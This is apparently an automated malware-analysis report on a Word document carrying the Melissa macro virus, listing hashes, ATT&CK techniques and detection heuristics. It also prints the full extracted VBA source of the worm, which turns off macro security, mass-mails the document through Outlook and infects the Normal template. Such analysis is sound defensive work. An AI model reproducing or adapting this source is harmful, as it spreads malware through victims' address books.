Melissa — Office (OLE) malware analysis

Static analysis result for SHA-256 15bee15b6bcbde0e…

MALICIOUS

Office (OLE)

Size: 446.5 KB
Created: 2007-11-21 15:36:00
Authoring application: Microsoft Word 9.0
First seen: 2016-04-16
MD5: 006bf123cfce276dcc5006c19547285c
SHA-1: 5392bfc022a2ea62bd782d4cf35f3d4e949ad0ae
SHA-256: 15bee15b6bcbde0efa48c2bb934ca2a98955cba47921d336642262aa8635000a
Risk Score: 208

Malware Insights

Melissa · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols

The sample is a Microsoft Word document containing a VBA macro module named 'Melissa' that runs when the document is opened (Document_Open). The macro attempts to disable Word's macro security warnings and then uses Outlook to send copies of the document to contacts in the user's address book. The ClamAV detection 'Win.Trojan.Melissa-4' strongly suggests this is a variant of the Melissa virus, known for its email propagation capabilities.

Heuristics (5)

  • ClamAV: Win.Trojan.Psycho-3 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected [medium] (OLE_VBA_MACROS), 2 related findings
    Document contains VBA macro code
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
    Attribute VB_Name = "Melissa"
    Attribute VB_Base = "1Normal.Melissa"
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = True
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    On Error Resume Next
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CU …
  • Document_Open macro [low] (OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script
    Attribute VB_Name = "Melissa"
    Attribute VB_Base = "1Normal.Melissa"
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = True
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    On Error Resume Next
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CU …
  • NOP-equivalent sled detected [medium] (SC_NOP_EQUIV_SLED)
    Long run of 0x40 bytes (0x40 decodes as `inc eax` on x86, so a contiguous run behaves like a NOP sled)
    Disassembly: attempted x86 opcode disassembly of the run

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   3743 bytes
SHA-256: 1cdfa4537e4bb35726cb0d0660c1b5e7fb4d08aec222549ea3334a925ce96e81
Detection
ClamAV: Doc.Trojan.Melissa-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Melissa"
Attribute VB_Base = "1Normal.Melissa"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
    For y = 1 To DasMapiName.AddressLists.Count
        Set AddyBook = DasMapiName.AddressLists(y)
        x = 1
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
        For oo = 1 To AddyBook.AddressEntries.Count
            Peep = AddyBook.AddressEntries(x)
            BreakUmOffASlice.Recipients.Add Peep
            x = x + 1
            If x > 50 Then oo = AddyBook.AddressEntries.Count
         Next oo
         BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
         BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
         BreakUmOffASlice.Send
         Peep = ""
    Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.codemodule.CountOfLines
ADCL = ADI1.codemodule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.codemodule.deletelines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.codemodule.deletelines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.codemodule.Lines(1, 1) = ""
ADI1.codemodule.deletelines 1
Loop
ToInfect.codemodule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.codemodule.Lines(BGN, 1) <> ""
ToInfect.codemodule.InsertLines BGN, ADI1.codemodule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.codemodule.Lines(1, 1) = ""
NTI1.codemodule.deletelines 1
Loop
ToInfect.codemodule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.codemodule.Lines(BGN, 1) <> ""
ToInfect.codemodule.InsertLines BGN, NTI1.codemodule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."
End Sub